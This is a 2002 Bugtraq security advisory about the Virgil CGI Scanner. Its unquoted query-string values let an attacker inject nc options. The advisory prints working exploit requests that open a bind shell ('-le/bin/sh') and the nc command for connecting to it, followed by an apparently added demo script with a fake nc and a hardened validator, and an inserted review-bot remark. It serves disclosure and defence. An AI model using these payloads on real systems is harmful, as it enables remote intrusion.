


Virgil CGI Scanner Vulnerability




Date: Tue, 22 Oct 2002 11:54:12 -0700
To: bugtraq@securityfocus.com
Subject: Virgil CGI Scanner Vulnerability
From: kalif@hushmail.com
Message-Id: <200210221854.g9MIsEIu056660@mailserver2.hushmail.com>


-----BEGIN PGP SIGNED MESSAGE-----

----------------------------------------------------------------------------
KALIF research group                                    kalif@hushmail.com
October 21st, 2002                                         Joschka Fischer
----------------------------------------------------------------------------

- Overview

  Software      : Virgil CGI Scanner 0.9
  Programmer    : Marc Ruef <marc.ruef@computec.ch>
  Vulnerability : Privilege Escalation
  Status        : Author has been notified
  Type          : remote

- Issue

  Joschka Fischer discovered a security hole in the CGI vulnerability scanner
  'Virgil' by Marc Ruef [1]. By sending a specially crafted request, one is able
  to spawn a remote shell with the privileges of the running CGI script.

  Depending on the web server setup this is either the owner of the script (suExec)
  or the user under which the HTTP daemon runs (usually nobody).

- Problem Description

  Virgil CGI Scanner by Marc Ruef is a simple Bash script which offers a web
  interface to start CGI security audits against foreign hosts. The author states
  that his software is the first free online CGI scanner and that it uses a very
  effective and fast technique to determine vulnerabilities.

  Marc Ruef - a self-proclaimed security expert - recently gained fame by posting
  various announcements to well-known security mailing lists and by writing a
  German book called "Hacking Intern", which deals with common security techniques
  and was released by a German gossip publishing house [2].

  To get the Virgil CGI Scanner look at:
   http://www.computec.ch/software/webserver/virgil_cgi_scanner/virgil-0.9.tar.gz
   MD5SUM: fe098b68c0de04cb0200f2db324ab10b

  For a running version visit:
   http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi

- Technical Description

  The vulnerable line in Virgil CGI Scanner 0.9 is the banner grab:

   BANNER=`echo -e "HEAD / HTTP/1.0\n\n" |nc -w 10 $TARGET $ZIELPORT`

  Both variables are taken straight from the query string, and neither is quoted
  nor validated before it reaches nc:

   TARGET=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $1}' |sed s/"tar="//`
   ZIELPORT=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $2}' |sed s/"zielport="// |sed "s/-//g"`

  Nevertheless there are a few restrictions, namely:
   - $QUERY_STRING is not URL-decoded, i.e. %20 is not replaced with ' ', so an
     attacker cannot introduce whitespace and gets at most one word per variable
   - In $ZIELPORT every dash ('-') is filtered out, so only $TARGET can be turned
     into an nc option

  To test whether the script is vulnerable, send the following request and then
  telnet to the given port number (here 31337) while the request is pending:

   /cgi-bin/virgil.cgi?tar=-lp&zielport=31337

  This makes the script run `nc -w 10 -lp 31337`, i.e. a listener on port 31337.

  Exploitation is straightforward as long as the installed nc supports the -e
  option:

   '/cgi-bin/virgil.cgi?tar=-le/bin/sh' runs `nc -w 10 -le/bin/sh`, which serves
  /bin/sh on a port chosen by nc for exactly 10 seconds ("-w 10"). To connect to
  this shell execute `nc -v TARGET.COM 1030-6000` while constantly requesting the
  URI mentioned above.
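  The following script is an added example (not part of this advisory and not
  Virgil's own code): it reproduces the three quoted lines of virgil.cgi with a
  stand-in "nc" that only echoes the argument vector it receives, so the effect of
  each query string on the nc command line can be seen without opening a listener.
  It also shows a hardened variant that validates both values before nc is called.
  The hostname www.example.com and the ports used in the demonstration are made up.

```shell
#!/bin/sh
# Added example, not from the advisory or from Virgil: reproduces virgil.cgi's
# query-string handling with a fake nc. Hostnames/ports below are constructed.

# Stand-in for nc: prints its arguments joined by single spaces.
fake_nc() {
    printf '%s' "$*"
}

# Virgil 0.9's parsing, as quoted in the advisory: field 1 of QUERY_STRING with
# "tar=" removed, field 2 with "zielport=" removed and every "-" stripped.
# Nothing is URL-decoded, so "%20" stays a literal part of the word.
virgil_parse_target() {
    echo "$1" | awk 'BEGIN{FS="&"}{print $1}' | sed s/"tar="//
}
virgil_parse_port() {
    echo "$1" | awk 'BEGIN{FS="&"}{print $2}' | sed s/"zielport="// | sed "s/-//g"
}

# The banner-grab line as Virgil runs it. TARGET and ZIELPORT stay unquoted, as
# in the original, so a value starting with "-" reaches nc as an option.
virgil_nc_argv() {
    TARGET=$(virgil_parse_target "$1")
    ZIELPORT=$(virgil_parse_port "$1")
    fake_nc -w 10 $TARGET $ZIELPORT
}

# Hardened variant (our suggestion, not the author's): treat both values as data.
# The host must be non-empty, must not start with "-" and may only contain
# hostname/IP characters; the port must be a decimal number in 1..65535.
# Anything else is rejected with exit status 1 before nc is ever invoked.
safe_nc_argv() {
    target=$(virgil_parse_target "$1")
    port=$(virgil_parse_port "$1")
    case "$target" in
        ''|-*) return 1 ;;
    esac
    printf '%s' "$target" | grep -Eq '^[A-Za-z0-9.-]+$' || return 1
    printf '%s' "$port" | grep -Eq '^[0-9]{1,5}$' || return 1
    [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || return 1
    fake_nc -w 10 "$target" "$port"
}

# Demonstration on the two requests from the advisory, the %20 case and a
# benign scan request.
for qs in 'tar=www.example.com&zielport=80' \
          'tar=-lp&zielport=31337' \
          'tar=-le/bin/sh' \
          'tar=-lp%2031337'; do
    printf '%-36s virgil: nc %s\n' "$qs" "$(virgil_nc_argv "$qs")"
    if out=$(safe_nc_argv "$qs"); then
        printf '%-36s safe:   nc %s\n' '' "$out"
    else
        printf '%-36s safe:   rejected\n' ''
    fi
done
```

  Note that the hardened parser still uses Virgil's own sed/awk extraction; the
  point is only that a value beginning with "-" or containing anything but
  hostname characters never reaches the nc command line.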

- Workaround / Patch

  We are currently not aware of any patches, but we suggest that you update your
  Virgil vulnerable-CGI database accordingly:

  *** apache.db.old	Sun Oct 23 23:05:05 1983
  --- apache.db   	Sun Oct 23 23:05:05 1985
  ***************
  *** 1,3 ****
  --- 1,5 ----
  + cgi-bin/virgil.cgi?tar=-lp&zielport=31337
  + cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
    cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd
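Review bot: the two added entries are active probes with side effects, not passive signature checks. Each request makes the scanned host run `nc -w 10 -lp 31337`, which opens a listener on port 31337 there for up to 10 seconds and stalls the CGI response for the same time, so a scan against a vulnerable host is slow and leaves a temporarily open port behind it; that side effect deserves a comment next to the entries, or a harmless probe value (one that fails nc's option parsing immediately) in place of `-lp&zielport=31337`.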

- References / Greets

  [1] http://www.computec.ch
  [2] http://www.amazon.de/exec/obidos/ASIN/381582284X

  Pengo for elite VMS security
  Nung at the CCC-Congress, next time I will ask for coffee.



-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wloEARECABoFAj21nuYTHGthbGlmQGh1c2htYWlsLmNvbQAKCRBfQx1m9p9BTXGvAJwL
bceg643rTUH1HXtJFbvmNqAd7gCgsKHGY9J6tFCj/DeB7RYEmrix0q8=
=nBCM
-----END PGP SIGNATURE-----





